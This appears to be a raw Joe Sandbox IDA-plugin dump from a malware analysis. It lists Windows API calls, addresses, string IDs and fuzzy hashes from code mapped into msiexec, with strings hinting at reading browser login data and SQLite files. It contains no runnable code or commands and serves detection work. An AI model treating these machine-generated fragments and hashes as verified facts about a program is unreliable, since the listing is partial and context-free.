                                                                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                      • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                      • String ID: BIN
                                                                                                                                                      • API String ID: 1668488027-1015027815
                                                                                                                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                                                                      • API String ID: 776488737-1622828088
                                                                                                                                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                      • String ID: -journal$-wal
                                                                                                                                                      • API String ID: 438689982-2894717839
                                                                                                                                                      • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                      • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3975816621-0
                                                                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                      APIs
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                                                                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                      APIs
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                      • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                      • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                      APIs
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2047574939-0
                                                                                                                                                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                      • String ID: gj
                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                      • String ID: 0$6
                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                                                                      • String ID: 6$\
                                                                                                                                                      • API String ID: 404372293-1284684873
                                                                                                                                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1470729244-0
                                                                                                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                      • API String ID: 2012295524-4050573280
                                                                                                                                                      • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                      • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                      APIs
                                                                                                                                                      Strings
